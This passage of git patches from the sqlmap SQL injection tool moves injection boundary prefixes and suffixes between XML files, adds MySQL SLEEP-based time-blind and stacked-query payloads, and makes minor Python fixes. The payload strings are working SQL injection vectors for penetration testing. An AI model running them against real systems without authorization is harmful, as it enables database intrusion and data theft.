+        <prefix>') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+    <!-- End of pre-WHERE derived table boundaries -->
+
+    <!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)"-->
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)||'</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)||'</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>1</ptype>
+        <prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)+'</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)+'</suffix>
+    </boundary>
+    <!-- End of INSERT/UPDATE generic boundaries -->
+
+    <!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>' IN BOOLEAN MODE)</prefix>
+        <suffix>#</suffix>
+    </boundary>
+    <!-- End of AGAINST boolean full-text search boundaries -->
+</root>
diff --git a/xml/payloads.xml b/xml/payloads/00_payloads.xml
similarity index 91%
rename from xml/payloads.xml
rename to xml/payloads/00_payloads.xml
index 5fb16dc72..6c3abadd7 100644
--- a/xml/payloads.xml
+++ b/xml/payloads/00_payloads.xml
@@ -1,66 +1,6 @@
 <?xml version="1.0" encoding="UTF-8"?>
 
 <!--
-Tag: <boundary>
-    How to prepend and append to the test ' <payload><comment> ' string.
-
-    Sub-tag: <level>
-        From which level check for this test.
-
-        Valid values:
-            1: Always (<100 requests)
-            2: Try a bit harder (100-200 requests)
-            3: Good number of requests (200-500 requests)
-            4: Extensive test (500-1000 requests)
-            5: You have plenty of time (>1000 requests)
-
-    Sub-tag: <clause>
-        In which clause the payload can work.
-
-        NOTE: for instance, there are some payload that do not have to be
-        tested as soon as it has been identified whether or not the
-        injection is within a WHERE clause condition.
-
-        Valid values:
-            0: Always
-            1: WHERE / HAVING
-            2: GROUP BY
-            3: ORDER BY
-            4: LIMIT
-            5: OFFSET
-            6: TOP
-            7: Table name
-            8: Column name
-
-        A comma separated list of these values is also possible.
-
-    Sub-tag: <where>
-        Where to add our '<prefix> <payload><comment> <suffix>' string.
-
-        Valid values:
-            1: When the value of <test>'s <where> is 1.
-            2: When the value of <test>'s <where> is 2.
-            3: When the value of <test>'s <where> is 3.
-
-        A comma separated list of these values is also possible.
-
-    Sub-tag: <ptype>
-        What is the parameter value type.
-
-        Valid values:
-            1: Unescaped numeric
-            2: Single quoted string
-            3: LIKE single quoted string
-            4: Double quoted string
-            5: LIKE double quoted string
-
-    Sub-tag: <prefix>
-        A string to prepend to the payload.
-
-    Sub-tag: <suffix>
-        A string to append to the payload.
-
-
 Tag: <test>
     SQL injection test definition.
 
@@ -189,16 +129,6 @@ Tag: <test>
             What is the database management system underlying operating
             system.
 
-Formats:
-    <boundary>
-        <level></level>
-        <clause></clause>
-        <where></where>
-        <ptype></ptype>
-        <prefix></prefix>
-        <suffix></suffix>
-    </boundary>
-
     <test>
         <title></title>
         <stype></stype>
@@ -229,451 +159,6 @@ Formats:
 -->
 
 <root>
-    <!-- Generic boundaries -->
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix>)</prefix>
-        <suffix></suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>')</prefix>
-        <suffix></suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1,2,3</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>'</prefix>
-        <suffix></suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>4</ptype>
-        <prefix>"</prefix>
-        <suffix></suffix>
-    </boundary>
-    <!-- End of generic boundaries -->
-
-    <!-- WHERE/HAVING clause boundaries -->
-    <boundary>
-        <level>1</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix>)</prefix>
-        <suffix> AND ([RANDNUM]=[RANDNUM]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>2</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix>))</prefix>
-        <suffix> AND (([RANDNUM]=[RANDNUM]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix>)))</prefix>
-        <suffix> AND ((([RANDNUM]=[RANDNUM]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>1</level>
-        <clause>0</clause>
-        <where>1,2,3</where>
-        <ptype>1</ptype>
-        <prefix></prefix>
-        <suffix></suffix>
-    </boundary>
-
-    <boundary>
-        <level>1</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>')</prefix>
-        <suffix> AND ('[RANDSTR]'='[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>2</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>'))</prefix>
-        <suffix> AND (('[RANDSTR]'='[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>')))</prefix>
-        <suffix> AND ((('[RANDSTR]'='[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>1</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>'</prefix>
-        <suffix> AND '[RANDSTR]'='[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>2</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>3</ptype>
-        <prefix>')</prefix>
-        <suffix> AND ('[RANDSTR]' LIKE '[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>3</ptype>
-        <prefix>'))</prefix>
-        <suffix> AND (('[RANDSTR]' LIKE '[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>3</ptype>
-        <prefix>')))</prefix>
-        <suffix> AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>2</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>3</ptype>
-        <prefix>'</prefix>
-        <suffix> AND '[RANDSTR]' LIKE '[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>2</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>4</ptype>
-        <prefix>")</prefix>
-        <suffix> AND ("[RANDSTR]"="[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>4</ptype>
-        <prefix>"))</prefix>
-        <suffix> AND (("[RANDSTR]"="[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>4</ptype>
-        <prefix>")))</prefix>
-        <suffix> AND ((("[RANDSTR]"="[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>2</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>4</ptype>
-        <prefix>"</prefix>
-        <suffix> AND "[RANDSTR]"="[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>5</ptype>
-        <prefix>")</prefix>
-        <suffix> AND ("[RANDSTR]" LIKE "[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>5</ptype>
-        <prefix>"))</prefix>
-        <suffix> AND (("[RANDSTR]" LIKE "[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>5</ptype>
-        <prefix>")))</prefix>
-        <suffix> AND ((("[RANDSTR]" LIKE "[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>5</ptype>
-        <prefix>"</prefix>
-        <suffix> AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>2</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%')</prefix>
-        <suffix> AND ('%'='</suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%'))</prefix>
-        <suffix> AND (('%'='</suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%')))</prefix>
-        <suffix> AND ((('%'='</suffix>
-    </boundary>
-
-    <boundary>
-        <level>1</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%'</prefix>
-        <suffix> AND '%'='</suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%00')</prefix>
-        <suffix> AND ('[RANDSTR]'='[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%00'</prefix>
-        <suffix> AND '[RANDSTR]'='[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>1</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix></prefix>
-        <suffix>-- [RANDSTR]</suffix>
-    </boundary>
-    <!-- End of WHERE/HAVING clause boundaries -->
-
-
-    <!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>4</ptype>
-        <prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-    <!-- End of pre-WHERE generic boundaries -->
-
-    <!-- Pre-WHERE derived table boundaries (e.g. "SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST["name"]%') AS t1"-->
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix>)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>4</ptype>
-        <prefix>") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix>) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>-- </suffix>
-    </boundary>
-    <!-- End of pre-WHERE derived table boundaries -->
-
-    <!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)"-->
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1</where>
-        <ptype>2</ptype>
-        <prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>)||'</suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1</where>
-        <ptype>2</ptype>
-        <prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>)||'</suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1</where>
-        <ptype>1</ptype>
-        <prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>)+'</suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1</where>
-        <ptype>2</ptype>
-        <prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
-        <suffix>)+'</suffix>
-    </boundary>
-    <!-- End of INSERT/UPDATE generic boundaries -->
-
-    <!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1</where>
-        <ptype>2</ptype>
-        <prefix>' IN BOOLEAN MODE)</prefix>
-        <suffix>#</suffix>
-    </boundary>
-    <!-- End of AGAINST boolean full-text search boundaries -->
-
     <!-- Boolean-based blind tests - WHERE/HAVING clause -->
     <test>
         <title>AND boolean-based blind - WHERE or HAVING clause</title>

From 84349a370acb234d6f460d14f57394444d472558 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sun, 15 Feb 2015 19:51:07 +0000
Subject: [PATCH 336/492] minor code cleanup

---
 xml/payloads/00_payloads.xml | 4 ----
 1 file changed, 4 deletions(-)

diff --git a/xml/payloads/00_payloads.xml b/xml/payloads/00_payloads.xml
index 6c3abadd7..8a87dd2b8 100644
--- a/xml/payloads/00_payloads.xml
+++ b/xml/payloads/00_payloads.xml
@@ -113,9 +113,6 @@ Tag: <test>
 
             NOTE: useful to test for UNION query (inband) SQL injection.
 
-        Sub-tag: <oob>
-            # TODO
-
     Sub-tag: <details>
         Which details can be infered if the payload succeed.
 
@@ -148,7 +145,6 @@ Tag: <test>
             <grep></grep>
             <time></time>
             <union></union>
-            <oob></oob>
         </response>
         <details>
             <dbms></dbms>

From e17d212c238188cbafbac95c9ab7005956528eaf Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sun, 15 Feb 2015 20:07:52 +0000
Subject: [PATCH 337/492] bug fix introduced with
 863d5a6281a5e24303d38ea99515bdb128456889

---
 lib/controller/checks.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 653f7d8d8..f636568a0 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -233,7 +233,7 @@ def checkSqlInjection(place, parameter, value):
                 # Skip test if the level is higher than the provided (or default)
                 # value
                 # Parse test's <level>
-                if not conf.testFilter and not test.level > conf.level:
+                if not conf.testFilter and test.level > conf.level:
                     debugMsg = "skipping test '%s' because the level (%d) " % (title, test.level)
                     debugMsg += "is higher than the provided (%d)" % conf.level
                     logger.debug(debugMsg)

From 32373996ee1079647dae82ad93c5458f0d1fa23e Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sun, 15 Feb 2015 20:53:40 +0000
Subject: [PATCH 338/492] standard message

---
 plugins/generic/filesystem.py | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py
index 61692f639..b069eabfe 100644
--- a/plugins/generic/filesystem.py
+++ b/plugins/generic/filesystem.py
@@ -67,13 +67,13 @@ class Filesystem:
                 if localFileSize == remoteFileSize:
                     sameFile = True
                     infoMsg = "the local file %s and the remote file " % localFile
-                    infoMsg += "%s have the same size" % remoteFile
+                    infoMsg += "%s have the same size (%db)" % (remoteFile, localFileSize)
                 elif remoteFileSize > localFileSize:
-                    infoMsg = "the remote file %s is larger than " % remoteFile
-                    infoMsg += "the local file %s" % localFile
+                    infoMsg = "the remote file %s is larger (%db) than " % (remoteFile, remoteFileSize)
+                    infoMsg += "the local file %s (%db)" % (localFile, localFileSize)
                 else:
-                    infoMsg = "the remote file %s is smaller than " % remoteFile
-                    infoMsg += "file '%s' (%d bytes)" % (localFile, localFileSize)
+                    infoMsg = "the remote file %s is smaller (%db) than " % (remoteFile, remoteFileSize)
+                    infoMsg += "file %s (%db)" % (localFile, localFileSize)
 
                 logger.info(infoMsg)
             else:

From 1636088b7522ce422196f18ffc54d3c9a46cc091 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 16 Feb 2015 11:48:53 +0100
Subject: [PATCH 339/492] Minor update

---
 lib/request/inject.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/request/inject.py b/lib/request/inject.py
index 9ff0cd638..0395c0a56 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -476,7 +476,7 @@ def goStacked(expression, silent=False):
     query = agent.prefixQuery(";%s" % expression)
     query = agent.suffixQuery(query)
     payload = agent.payload(newValue=query)
-    Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare=True)
+    Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare="SELECT" in (payload or "").upper())
 
 def checkBooleanExpression(expression, expectingNone=True):
     return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone)

From c51ecf33f3351aa8d126ef887ec949cebef4b14d Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Wed, 18 Feb 2015 09:45:44 +0000
Subject: [PATCH 340/492] ported the recent MySQL time-based payload
 (introduced with 66c2a7939761a54cefce5aead662bfd2f2716608) to other
 techniques and conditions

---
 xml/payloads/00_payloads.xml | 123 +++++++++++++++++++++++++++++++++++
 1 file changed, 123 insertions(+)

diff --git a/xml/payloads/00_payloads.xml b/xml/payloads/00_payloads.xml
index 8a87dd2b8..17699810f 100644
--- a/xml/payloads/00_payloads.xml
+++ b/xml/payloads/00_payloads.xml
@@ -1641,6 +1641,47 @@ Tag: <test>
     <!-- End of inline queries tests -->
 
     <!-- Stacked queries tests -->
+    <test>
+        <title>MySQL &gt; 5.0.11 stacked queries (SELECT)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &gt; 5.0.11 stacked queries</title>
         <stype>4</stype>
@@ -2524,6 +2565,47 @@ Tag: <test>
     <!-- End of AND time-based blind tests -->
 
     <!-- OR time-based blind tests -->
+    <test>
+        <title>MySQL &gt; 5.0.11 OR time-based blind (SELECT)</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 OR time-based blind (SELECT - comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &gt; 5.0.11 OR time-based blind</title>
         <stype>5</stype>
@@ -2846,6 +2928,47 @@ Tag: <test>
     <!-- Time-based tests - After ORDER BY...LIMIT... -->
 
     <!-- Time-based blind tests - Parameter replace -->
+    <test>
+        <title>MySQL &gt; 5.0.11 AND time-based blind (SELECT)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 AND time-based blind (SELECT - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &gt;= 5.0 time-based blind - Parameter replace</title>
         <stype>5</stype>

From 560bc7cc28f81329b329ae99b219bb53ba728c17 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Wed, 18 Feb 2015 09:51:07 +0000
Subject: [PATCH 341/492] minor fixes

---
 xml/payloads/00_payloads.xml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/xml/payloads/00_payloads.xml b/xml/payloads/00_payloads.xml
index 17699810f..7799d4b66 100644
--- a/xml/payloads/00_payloads.xml
+++ b/xml/payloads/00_payloads.xml
@@ -1650,7 +1650,7 @@ Tag: <test>
         <where>1</where>
         <vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
-            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
         </request>
         <response>
             <time>[SLEEPTIME]</time>
@@ -1663,7 +1663,7 @@ Tag: <test>
 
     <test>
         <title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title>
-        <stype>5</stype>
+        <stype>4</stype>
         <level>4</level>
         <risk>0</risk>
         <clause>0</clause>
@@ -2929,7 +2929,7 @@ Tag: <test>
 
     <!-- Time-based blind tests - Parameter replace -->
     <test>
-        <title>MySQL &gt; 5.0.11 AND time-based blind (SELECT)</title>
+        <title>MySQL &gt; 5.0.11 time-based blind - Parameter replace (SELECT)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>1</risk>
@@ -2949,7 +2949,7 @@ Tag: <test>
     </test>
 
     <test>
-        <title>MySQL &gt; 5.0.11 AND time-based blind (SELECT - comment)</title>
+        <title>MySQL &gt; 5.0.11 time-based blind - Parameter replace (SELECT - comment)</title>
         <stype>5</stype>
         <level>5</level>
         <risk>1</risk>

From daa8e0d8c5797798e9387ffcf3be1971c4aa8fc2 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Wed, 18 Feb 2015 10:13:28 +0000
Subject: [PATCH 342/492] minor fix

---
 lib/parse/payloads.py | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py
index 84e6b0a82..c98a7f014 100644
--- a/lib/parse/payloads.py
+++ b/lib/parse/payloads.py
@@ -10,6 +10,7 @@ import os
 from xml.etree import ElementTree as et
 
 from lib.core.data import conf
+from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.datatype import AttribDict
 from lib.core.exception import SqlmapInstallationException
@@ -88,6 +89,8 @@ def loadPayloads():
     for payloadFile in payloadFiles:
         payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)
 
+        #logger.debug("Parsing payloads from file '%s'" % payloadFile)
+
         try:
             doc = et.parse(payloadFilePath)
         except Exception, ex:
@@ -96,5 +99,5 @@ def loadPayloads():
             errMsg += "sure that you haven't made any changes to it"
             raise SqlmapInstallationException, errMsg
 
-    root = doc.getroot()
-    parseXmlNode(root)
+        root = doc.getroot()
+        parseXmlNode(root)

From 6cc092b926eaafb1a8439ebe680960120ce9aca3 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Wed, 18 Feb 2015 10:13:44 +0000
Subject: [PATCH 343/492] split payloads in different files

---
 xml/payloads/00_payloads.xml        | 4288 ---------------------------
 xml/payloads/01_boolean_blind.xml   |  671 +++++
 xml/payloads/02_error_based.xml     |  854 ++++++
 xml/payloads/03_inline_query.xml    |  120 +
 xml/payloads/04_stacked_queries.xml |  337 +++
